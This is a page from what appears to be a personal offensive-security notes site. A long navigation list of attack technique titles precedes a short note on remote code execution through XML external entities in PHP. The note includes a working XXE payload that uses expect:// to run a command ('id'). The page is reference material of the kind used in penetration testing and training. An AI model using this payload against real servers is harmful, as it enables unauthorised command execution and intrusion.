Cardboard Iguana Security

journals

spells

Abusing wildcard expansion in Bash

Access the Windows Registry using PowerShell

Add Windows users at the command line

Aircrack-NG

ARP scanning

ARP

AS-REP roasting with Impacket

AS-REP roasting With Rubeus

AS-REP roasting

Automate Netlify builds with IFTTT

Automatically stabilize a reverse shell with socat

Avoid dropping privileges with SUID Bash

awk

Backdoor Visual Basic Scripts

basenc

Bash reverse shell

Bash scripting

Bulk edit Windows permissions

Burp Suite

Bypass the PowerShell execution policy

Bypass Windows antivirus with C Sharp

Calculate a file hash on Windows with CertUtil

Call Mimikatz from a meterpreter shell

cat

cewl

Change a branch name in Git

Change an RSA key passphrase with OpenSSL

Cisco IOS

Common Windows user types

Compact VM disk images

Confirm the existence of a Gmail address

crackmapexec

Create a GPG key with SSH support

Create a zip bomb

CUPP

Day One to Obsidian conversion script

DCERPC

Debugging Bash scripts

Easy reverse DNS lookups

enum4linux

Enumerate AD CS templates with CertUtil

Equivalent Windows and UNIX commands

Evil-WinRM

Exploit LD_LIBRARY_PATH

Exploit LD_PRELOAD

Exploit local Windows services

Exploit local Windows tasks

Exploit remote Windows services

Exploit remote Windows tasks

Exploit the Bash PS4 prompt

Exploit the Windows DLL search order

Exploit the Windows FoDHelper

Exploit the WinLogon initialization sequence

Exploit VBA scripts with msfvenom

Exploit weak etc-passwd permissions

Exploit weak etc-shadow permissions

Exploit Windows file associations

Exploit Windows HTML applications with msfvenom

Exploit Windows services

Exploit Windows shortcut files

Exploit Windows tasks

Export highlights and annotations from Kobo eReaders

Extract the webpage title from a URL

ffmpeg

Find and replace a single line in a large text file

Find executables with SUID capabilities

find

findstr

finger

Fix EXIF data on Google Photos exports

Gemini compatible markdown

Get a shell from ViM

Get an SSL certificate

Golden and silver ticket attacks

IIS configuration data

Kerberoasting with Impacket

Kerberoasting with Rubeus

Load a shell with a simple executable

Local file inclusion attacks

Look up unicode symbols and emojis

MAC address

Magic numbers

man

Match files to packages in Debian-based operating systems

Match files to packages in Red Hat-based operating systems

Metasploit MS SQL modules

meterpreter

Mimikatz

MITRE ATTaCK emulation plans

PHP local file inclusion attacks

PHP

ping

Poison null byte attack

Poison null byte in PHP

Polkit

Pop a SYSTEM shell on the Windows login screen using sticky keys

Pop a SYSTEM shell on the Windows login screen using Utilman

POP3

Port scanning with Bash

POSIX process signals

Powercat

PowerShell reverse shell

PowerView

Pull SSL certificates from an external server

Python

Quick-n-dirty Python web server

Quickly bypass ssh-agent

Quickly find the canonical path of a file

RCE via XXE in PHP

Read a file beginning with a dash

reg

RegEx metacharacters

Remotely install a Windows package with PowerShell

Remove duplicate lines in Bash

Retrieve AIX fileset information

Retrieve AIX system information

Rubeus

Ruby

Run a remote Windows command using PowerShell

Run commands directly with PowerShell

RunAs

Send a command using OpenSSL

Set the PATH in a session on UNIX-like operating systems

Set the PATH in a session on Windows

Set up WMI in PowerShell

SQL injection attacks

Transfer files over FTP using netcat

UDP

unbuffer

Uniform resource locators

UNIX file descriptors

UNIX password hashes

UNIX permissions

Unquoted path handling in Windows

Upgrade PostgreSQL

Use a Raspberry Pi 4B as hacking accessory

Use an alternate SSH key with Git

Use Bash functions to backdoor executables

Use Burp Suite with Firefox

Use Burp Suite with mobile apps

Use curl and jq with web APIs

Use OpenSSL to encrypt and decrypt files

Use the Windows Firewall to relay ports

Use unsupported display resolutions with Samsung DeX

Use WinRM with PowerShell

Useful built-in commands for Linux reconnaissance

Useful built-in commands for Windows reconnaissance

Useful Linux reconnaissance scripts

Useful scripts for Windows reconnaissance

ViM

Visual Basic for Applications

wfuzz

whoami

Wi-Fi

Windows DLL search order

Windows event IDs

Windows event logs

Windows local service accounts

Windows logon scripts

Windows permissions

Windows reconnaissance with PowerShell

Windows Remote Management

Windows Run and RunOnce Registry keys

Windows Scripting Host

Windows SeBackup and SeRestore permissions

Windows SeImpersonate and SeAssignPrimaryToken permissions

Windows service ACLs

Windows services

Windows SeTakeOwnership permission

Windows Startup folder

Windows unattended installation data

winrs

Wireshark

wmic

Work with base64 encoding using PowerShell

Work with remote services using WMI and PowerShell

Work with remote tasks using WMI and PowerShell

Working with services in PowerShell

Cardboard Iguana Security

permalink: spells/rce-via-xxe-in-php
tags:
  - AttackCycle/Exploitation/XXE
  - Language/PHP
  - FileFormat/XML

RCE via XXE in PHP

If you're dealing with PHP, and if the PHP expect module is loaded, and if XML inputs aren't properly sanitized, then defining a SYSTEM entity with the value of expect://$COMMAND will get you RCE via XXE.

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxerce SYSTEM "expect://id">]>
<root>&xxerce;</root>

Don't expect to run into this often however, as this combination of factors is pretty rare.

RCE via XXE in PHP

Interactive graph

On this page

RCE via XXE in PHP